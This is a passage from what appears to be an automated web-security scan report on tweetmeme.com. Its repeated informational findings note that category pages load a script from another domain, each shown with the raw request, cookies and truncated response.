The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:32:51 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0069949626922607
X-Served-In: 0.058082103729248
X-Served-By: ded2059
Content-Length: 55939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Tec
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.398. http://tweetmeme.com/category/technology-apple previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/technology-apple

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-apple HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:33:50 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.004241943359375
X-Served-In: 0.061571836471558
X-Served-By: h04
Content-Length: 55432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
App
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.399. http://tweetmeme.com/category/technology-design previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/technology-design

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-design HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:33:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0040419101715088
X-Served-In: 0.041590213775635
X-Served-By: ded2062
Content-Length: 52678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Des
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.400. http://tweetmeme.com/category/technology-gadgets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/technology-gadgets

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-gadgets HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:34:14 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037078857421875
X-Served-In: 0.055214881896973
X-Served-By: ded2061
Content-Length: 55793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Gad
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.401. http://tweetmeme.com/category/technology-hardware previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/technology-hardware

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-hardware HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:34:48 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0034070014953613
X-Served-In: 0.045053005218506
X-Served-By: h02
Content-Length: 57584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Har
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.402. http://tweetmeme.com/category/technology-linuxunix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/technology-linuxunix

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-linuxunix HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:35:00 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0034079551696777
X-Served-In: 0.044731140136719
X-Served-By: ded2062
Content-Length: 55757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Lin
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.403. http://tweetmeme.com/category/technology-microsoft previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/technology-microsoft

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-microsoft HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:35:12 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0052421092987061
X-Served-In: 0.050689220428467
X-Served-By: h01
Content-Length: 57472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Mic
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.404. http://tweetmeme.com/category/technology-programming previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/technology-programming

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-programming HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:35:25 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0046720504760742
X-Served-In: 1.6501049995422
X-Served-By: h00
Content-Length: 54400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Pro
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.405. http://tweetmeme.com/category/technology-security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/technology-security

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-security HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:36:01 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0038430690765381
X-Served-In: 0.052386045455933
X-Served-By: h03
Content-Length: 52607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Sec
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.406. http://tweetmeme.com/category/technology-software previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/technology-software

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-software HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:36:40 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0036530494689941
X-Served-In: 0.059098958969116
X-Served-By: h01
Content-Length: 55024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Sof
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.407. http://tweetmeme.com/category/worldbusiness previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/worldbusiness

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/worldbusiness HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:37:24 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0032830238342285
X-Served-In: 0.055141925811768
X-Served-By: h02
Content-Length: 54653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Wor
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.408. http://tweetmeme.com/category/worldbusiness-business previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/worldbusiness-business

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/worldbusiness-business HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:37:47 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0032651424407959
X-Served-In: 0.059489011764526
X-Served-By: h03
Content-Length: 55901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Bus
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.409. http://tweetmeme.com/category/worldbusiness-finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/worldbusiness-finance

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/worldbusiness-finance HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:37:58 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0032138824462891
X-Served-In: 0.049069881439209
X-Served-By: ded2061
Content-Length: 56493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Fin
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.410. http://tweetmeme.com/category/worldbusiness-jobs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/worldbusiness-jobs

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/worldbusiness-jobs HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:38:04 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0067570209503174
X-Served-In: 0.076403141021729
X-Served-By: h04
Content-Length: 56901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Job
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.411. http://tweetmeme.com/category/worldbusiness-news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/worldbusiness-news

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/worldbusiness-news HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:38:25 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0045719146728516
X-Served-In: 0.057440996170044
X-Served-By: ded2062
Content-Length: 55009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
New
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.412. http://tweetmeme.com/category/worldbusiness-politicalnews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/worldbusiness-politicalnews

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/worldbusiness-politicalnews HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:38:27 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0034549236297607
X-Served-In: 0.05449104309082
X-Served-By: ded2062
Content-Length: 55573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Pol
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.413. http://tweetmeme.com/media/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/media/news

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /media/news HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:39:04 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0042040348052979
X-Served-In: 0.038295984268188
X-Served-By: h01
Content-Length: 55415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.414. http://tweetmeme.com/page/10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/page/10

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /page/10 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
